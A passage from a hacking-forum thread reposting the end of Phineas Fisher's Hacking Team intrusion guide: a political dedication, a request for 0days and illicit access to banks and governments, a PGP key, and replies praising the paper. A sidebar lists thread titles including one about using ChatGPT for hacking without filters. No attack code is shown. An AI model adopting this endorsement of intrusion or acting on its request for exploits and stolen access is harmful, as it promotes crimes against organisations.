high consulting fees, who are often those most deserving to be hacked. Hacking Team saw themselves as part of a long line of inspired Italian design [1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri, and government, as part of a long tradition of Italian fascism. I'd like to dedicate this guide to the victims of the raid on the Armando Diaz school, and to all those who have had their blood spilled by Italian fascists. [1] https://twitter.com/coracurrier/status/618104723263090688 --[ 18 - Contact ]-------------------------------------------------------------- To send me spear phishing attempts, death threats in Italian [1][2], and to give me 0days or access inside banks, corporations, governments, etc. [1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/ [2] https://twitter.com/CthulhuSec/status/619459002854977537 only encrypted email please: https://securityinabox.org/es/thunderbird_usarenigmail -----BEGIN PGP PUBLIC KEY BLOCK----- mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g 27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x +fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8 Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0 JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys 4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8 X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9 WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k =E5+y -----END PGP PUBLIC KEY BLOCK-----                       If not you, who? If not now, when?                 _  _            _      ____            _    _               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |               |  _  | (_| | (__|  <  | |_) | (_| | (__|  <|_|               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Reply
#2
Personally, I found this paper very interesting. It showed how relatively easy the intrusion was.

In 2019, the same hacker (Phineas Fisher) published another paper on how he hacked and robbed a bank. In the latter, he provides some interesting details about the hack against Hacking Team.
Reply
#3
Nice finding. There are three parts in total (Gamma Group, Hacking Team, Cayman National Bank) available here.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  How to make money with hacking ssrf 1,241 72,118 Yesterday, 04:51 AM
Last Post: cookky1
  ⚡BEST HACKING TOOLS ⚡ ssrf 1,239 70,256 07-05-2026, 10:35 AM
Last Post: Holyxx
  [TUTORIAL] Infinite Accounts on DISCORD ✅ Sorryy 86 5,845 06-25-2026, 01:35 PM
Last Post: FBIINTHEHOUSE
  Full guide to run chatgpt locally for hacking without filter Helel 467 16,527 06-24-2026, 09:01 PM
Last Post: Mego02
  (( ☠︎︎ HACKING ☠︎︎ )) HOW TO FIND OUT THE INFORMATION ON THE TARGET DEVICE/COMPUTER Rayzers 92 5,248 03-27-2026, 11:03 AM
Last Post: sosoDali



 Users browsing this thread: 1 Guest(s)